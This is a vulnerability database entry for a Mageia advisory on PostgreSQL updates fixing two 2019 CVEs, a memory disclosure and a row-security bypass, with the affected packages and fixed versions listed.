MGASA-2019-0189

See a problem?
Please try reporting it to the source first.
Source
https://advisories.mageia.org/MGASA-2019-0189.html
Import Source
https://advisories.mageia.org/MGASA-2019-0189.json
JSON Data
https://api.osv.dev/v1/vulns/MGASA-2019-0189
Related
Published
2019-06-10T19:17:03Z
Modified
2019-06-10T18:39:25Z
Summary
Updated postgresql packages fix security vulnerabilities
Details

Updated postgresql packages fix security vulnerabilities

CVE-2019-10129: Memory disclosure in partition routing Prior to this release, a user running PostgreSQL 11 can read arbitrary bytes of server memory by executing a purpose-crafted INSERT statement to a partitioned table.

CVE-2019-10130: Selectivity estimators bypass row security policies PostgreSQL maintains statistics for tables by sampling data available in columns; this data is consulted during the query planning process. Prior to this release, a user able to execute SQL queries with permissions to read a given column could craft a leaky operator that could read whatever data had been sampled from that column. If this happened to include values from rows that the user is forbidden to see by a row security policy, the user could effectively bypass the policy. This is fixed by only allowing a non-leakproof operator to use this data if there are no relevant row security policies for the table.

References
Credits

Affected packages

Mageia:6 / postgresql9.4

Package

Name
postgresql9.4
Purl
pkg:rpm/mageia/postgresql9.4?distro=mageia-6

Affected ranges

Type
ECOSYSTEM
Events
Introduced
0Unknown introduced version / All previous versions are affected
Fixed
9.4.22-1.mga6

Ecosystem specific 

{
    "section": "core"
}

Mageia:6 / postgresql9.6

Package

Name
postgresql9.6
Purl
pkg:rpm/mageia/postgresql9.6?distro=mageia-6

Affected ranges

Type
ECOSYSTEM
Events
Introduced
0Unknown introduced version / All previous versions are affected
Fixed
9.6.13-3.mga6

Ecosystem specific 

{
    "section": "core"
}